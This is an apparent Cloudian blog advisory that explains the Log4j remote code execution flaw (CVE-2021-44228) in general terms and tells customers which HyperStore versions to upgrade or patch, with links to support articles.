As has been widely reported, the Log4j2 software library was recently found to have vulnerabilities. Cloudian took immediate action and has provided patches to our customers to remediate the issue. Data security is a foremost concern at Cloudian, and our customers have been directly advised by the Cloudian Support organization on the steps needed. This blog further explains the issue and outlines the steps that Cloudian has taken.
What is the Log4J Vulnerability?
The originally reported CVE-2021-44228 is a remote code execution (RCE) vulnerability that affects the Apache Log4j2 software library. It exploits the use of Java Naming and Directory Interface (JNDI) and a default logging feature called “Message Lookup Substitution” which can lead to certain special strings being replaced, at the time of logging, by other dynamically-generated strings that could leave LDAP and JNDI endpoints unprotected.
It has been discovered that one of the lookup methods — specifically the JNDI lookup paired with the LDAP protocol — will fetch a specified Java class from a remote source and deserialize it, executing some of the class’s code in the process. This means that if any part of a logged string can be controlled by a remote attacker, that attacker can then gain remote code execution on the application that logged the string.
Who is at Risk?
Attackers are actively exploiting this CVSS 10.0 critical vulnerability. There appears to be no specific targets for this—nation state and various known hacker organizations are taking a shotgun approach to impact anyone they can attack.
Because of the potential reach and severity of such a remote code execution, security researchers are emphasizing the need to take action. Only a single line of text is required to exploit the vulnerability.
Cloudian’s Actions and Recommendations
Cloudian has responded to potential threat of exploitation of a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, being called the “Log4Shell” vulnerability.
Cloudian customers should take the following action:
- HyperFile and HyperIQ: No action required. These products do not use the Log4J libraries.
- Customers running HS 7.1.x or older should immediately upgrade to a newer version.
- Customers running HS 7.2.x or newer should immediately implement this patch now available on the Cloudian Support Portal:
- Article 2627 – [SECURITY] Upgrade Log4j library for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105
Additional Information and Resources
The following Cloudian Knowledge-base Articles as Security Advisories are available for external use for registered customers by accessing the Cloudian Support Portal at https://cloudian-support.force.com.
- KBA# 2625 https://cloudian-support.force.com/s/article/SECURITY-Cloudian-HyperStore-Log4j-vulnerability-CVE-2021-44228
- KBA# 2627 https://cloudian-support.force.com/s/article/SECURITY-Upgrade-Log4j-library-for-CVE-2021-44228